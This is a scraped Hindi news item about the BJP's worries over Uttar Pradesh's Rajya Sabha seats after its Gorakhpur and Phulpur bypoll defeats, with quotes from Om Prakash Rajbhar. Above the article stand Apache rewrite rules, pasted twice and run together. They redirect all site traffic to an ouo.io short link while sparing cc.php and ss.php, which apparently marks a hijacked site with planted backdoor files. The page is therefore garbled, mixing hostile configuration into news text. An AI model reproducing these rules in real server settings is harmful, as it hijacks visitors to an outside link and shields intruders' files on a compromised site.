
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 323
नई दिल्ली। उत्तरप्रदेश की गोरखपुर और फूलपुर लोकसभा सीट पर उपचुनाव में करारी हार के बाद सहयेागी दल भाजपा को राज्यसभा में भी परेशानी खड़ी कर सकती है। जानकारी के अनुसार 23 मार्च को उत्तरप्रद्रश की 10 राज्यसभा सीटों पर मुश्किल का सामना करना पड़ सकता है।
आपको बता दें कि उत्तर प्रदेश की में विधानसभा की कुल 403 सीटें हैं। यहां भाजपा अपने संख्या बल के आधार पर 10 में से आठ सीटें जीत सकती हैं। इसके आलावा यूपी में सपा और बसपा भी अपनी एक-एक सीटें जीत सकती हैं। लेकिन भाजपा ने यूपी में अपना नौवां प्रत्याशी भी खड़ा किया है। इस मामले में सुहेलदेव भारतीय समाज पार्टी के अध्यक्ष ओमप्रकाश राजभर ने कहा कि हम अभी से कैसे बता सकते हैं कि अगले राज्यसभा चुनाव में हम भाजपा को वोट देंगे या किसी अन्य पार्टी को। हमने अभी इस पर कोई अंतिम फैसला नहीं किया है। हालांकि सुहेलदेव भारतीय समाज पार्टी के अध्यक्ष कई बार केंद्र सरकार पर अपनी नाराजगी जाता चुके हैं, इसे देखते हुए ऐसे कयास लगाये जा रहे हैं कि वो अंतिम समय में अपना फैसला बदल सकते हैं। इससे पहले भाजपा के प्रति नाराजगी जताते हुए ओमप्रकाश राजभर ने कहा कि हम अभी भाजपा के साथ गठबंधन में हैं, लेकिन सवाल यह है कि क्या भाजपा ने राज्यसभा और गोरखपुर तथा फूलपुर लोकसभा सीटों के उपचुनाव के लिए अपने प्रत्याशी तय करने से पहले हमसे कोई सलाह ली थी।